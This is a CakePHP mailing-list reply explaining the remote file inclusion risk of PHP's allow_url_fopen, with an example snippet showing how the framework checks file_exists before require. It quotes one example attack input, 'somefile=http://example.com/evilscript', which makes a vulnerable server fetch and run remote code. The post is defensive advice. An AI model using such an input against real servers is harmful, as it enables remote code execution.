You should read up on allow_url_fopen, and the *huge* security risk it poses if you're not careful. You should never use any filesystem functions on remote resources, especially if you don't control them.
Thanks for pointing this out nate ! in case there are others who didn't know about this either, I just looked it up : The security risk is that having allow_url_fopen also applies to 'include' and 'require'. For example in a situation where you'd have register_globals and allow_url_fopen on, and such type of code : include $somefile; Then an attacker could run any code on your server calling the page with 'somefile=http://example.com/evilscript'. This obviously an extreme case, but more subtle attacks could be done on the same principle. I thought I'd point out that Cake is quite safe in this regards - while it does use 'include' with variables (obviously, since it loads the files associated with models/etc.) it does so in a safe way by checking if the file is truly a file with file_exists first (url_fopen does not apply to file_exists). For instance in loadModel : if (file_exists($path . $name . '.php')) { require($path . $name . '.php'); // ......... } But you never know how code evolves over time - and since it's a risk it is best to have allow_url_fopen off. Sorry for the bad advice :( Anselm --~--~---------~--~----~------------~-------~--~----~ You received this message because you are subscribed to the Google Groups "Cake PHP" group. To post to this group, send email to [email protected] To unsubscribe from this group, send email to [EMAIL PROTECTED] For more options, visit this group at http://groups.google.com/group/cake-php?hl=en -~----------~----~----~----~------~----~------~--~---
